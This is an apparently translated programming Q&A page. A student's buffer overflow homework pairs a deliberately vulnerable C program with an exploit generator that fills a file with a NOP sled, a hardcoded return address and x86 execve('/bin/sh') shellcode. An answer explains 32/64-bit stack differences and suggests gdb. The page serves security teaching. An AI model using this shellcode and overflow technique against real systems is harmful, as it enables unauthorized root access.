缓冲区溢出攻击分段错误(核心转储)

时间:2016-01-31 00:48:53

标签: c security assembly

我试图在缓冲区溢出攻击中完成我的作业分配以进入root shell,但每次我运行stack.c时它都会给我一个分段错误。我想知道是否有人能指出我正确的方向。我'已经

/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
    char buffer[12];

    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);
    return 1;
}
int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;
    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);
    printf("Returned Properly\n");
    return 1;
}

这是我编辑过的。

/* exploit.c*/
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0"      /* xorl     %eax,%eax   */
"\x50"          /* pushl    %eax        */
"\x68""//sh"    /* pushl    $0x68732f2f */
"\x68""/bin"    /* pushl    $0x6e69622f */
"\x89\xe3"      /* movl     %esp,%ebx   */
"\x50"          /* pushl    %eax        */
"\x53"          /* pushl    %ebx        */
"\x89\xe1"      /* movl     %esp,%ecx   */
"\x99"          /* cdql                 */
"\xb0\x0b"      /* movb     $0x0b,%al   */
"\xcd\x80"      /* int      $0x80       */
;

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    long buffer_start = 0xbffff174;
    long landing = buffer_start + 250;
    long* ptr = (long*)(buffer + 24);
    *ptr = landing;
    memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, sizeof(shellcode));

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}

1 个答案:

答案 0 :(得分:2)

你的问题很令人费解。

不仅不清楚你是如何真正编译这些东西的,也不是它是如何运行的。

有问题的shellcode假设一个32位的Linux二进制文件。此外,在64位Linux上运行的32位二进制文​​件的堆栈位置与在32位系统上运行所述二进制文件时的堆栈位置不同。这反过来意味着必须考虑到那个代替旧地址的返回地址。有可能你的学校甚至告诉你要运行一个32位的虚拟机或其他东西。

无论如何,你的第一步应该是检查崩溃,你可以使用gdb(或其他调试器,在类中使用的任何东西),你应该告诉它。

这是关于这个主题的经典,用32位时间写成:http://phrack.org/issues/49/14.html&#34;为了娱乐和利润粉碎堆栈&#34;